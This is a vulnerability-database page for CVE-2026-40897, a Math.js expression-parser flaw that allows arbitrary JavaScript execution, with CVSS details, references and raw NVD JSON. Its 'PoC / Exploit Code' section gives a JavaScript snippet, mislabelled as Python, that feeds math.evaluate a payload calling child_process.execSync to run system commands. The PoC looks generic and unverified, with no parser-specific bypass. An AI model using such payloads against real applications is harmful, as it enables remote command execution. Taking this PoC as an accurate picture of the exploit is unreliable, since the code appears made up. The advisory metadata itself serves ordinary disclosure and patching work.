CVE-2026-40897

Description

Math.js is an extensive math library for JavaScript and Node.js. From 13.1.1 to before 15.2.0, a vulnerability allowed executing arbitrary JavaScript via the expression parser of mathjs. You can be affected when you have an application where users can evaluate arbitrary expressions using the mathjs expression parser. This vulnerability is fixed in 15.2.0.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mathjs:mathjs:*:*:*:*:*:node.js:*:* - VULNERABLE

Math.js >= 13.1.1

Math.js < 15.2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC for CVE-2026-40897
// Demonstrating arbitrary code execution via the mathjs expression parser
const math = require('mathjs');

// Malicious payload attempting to execute system commands
// In vulnerable versions, the parser allows access to Node.js internal functions
const payload = "process.mainModule.require('child_process').execSync('whoami').toString()";

try {
    const result = math.evaluate(payload);
    console.log("[+] Exploit Successful! Output: " + result);
} catch (error) {
    console.log("[-] Exploit Failed or Patched: " + error.message);
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-40897
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-40897
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-40897/
[4] VulDB https://vuldb.com/cve/CVE-2026-40897
[5] https://github.com/josdejong/mathjs/commit/513ab2a0e01004af91b31aada68fae8a821326ad
[6] https://github.com/josdejong/mathjs/pull/3656
[7] https://github.com/josdejong/mathjs/security/advisories/GHSA-29qv-4j9f-fjw5

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-40897", "sourceIdentifier": "[email protected]", "published": "2026-04-24T17:16:20.783", "lastModified": "2026-04-27T14:47:56.323", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Math.js is an extensive math library for JavaScript and Node.js. From 13.1.1 to before 15.2.0, a vulnerability allowed executing arbitrary JavaScript via the expression parser of mathjs. You can be affected when you have an application where users can evaluate arbitrary expressions using the mathjs expression parser. This vulnerability is fixed in 15.2.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-915"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mathjs:mathjs:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "13.1.1", "versionEndExcluding": "15.2.0", "matchCriteriaId": "8DB079CB-9A5C-4138-B8E5-7607D3DDC20A"}]}]}], "references": [{"url": "https://github.com/josdejong/mathjs/commit/513ab2a0e01004af91b31aada68fae8a821326ad", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/josdejong/mathjs/pull/3656", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/josdejong/mathjs/security/advisories/GHSA-29qv-4j9f-fjw5", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}